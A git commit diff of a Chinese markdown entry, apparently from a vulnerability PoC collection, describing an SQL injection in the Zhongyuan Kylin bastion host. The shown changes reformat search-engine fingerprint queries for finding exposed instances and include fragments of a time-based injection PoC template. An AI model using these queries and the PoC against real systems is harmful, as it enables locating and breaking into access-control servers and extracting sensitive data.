Update 中远麒麟堡垒机SQL注入.md

2025-02-27 04:39:25 +00:00 · 2023-09-14 17:51:04 +08:00 · 2023-09-14 17:51:04 +08:00 · 8bcc63e242
commit 8bcc63e242
parent 2496f1ac57
1 changed files with 6 additions and 4 deletions
--- a/中远麒麟堡垒机SQL注入.md
+++ b/中远麒麟堡垒机SQL注入.md
@ -1,8 +1,11 @@
 ## 中远麒麟堡垒机SQL注入
 麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入，可利用该漏洞获取系统敏感信息。
-检索条件:
-cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login"

+
+检索条件：
+cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 
+
+或 body="admin.php?controller=admin_index&action=login"
 ```
 poc:
  relative: req0 && req1
@ -30,8 +33,7 @@ poc:
    matches: time.lt("5")

 ```
-检索条件：
-cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 或 body="admin.php?controller=admin_index&action=login"
+

 ## 请求包
 ```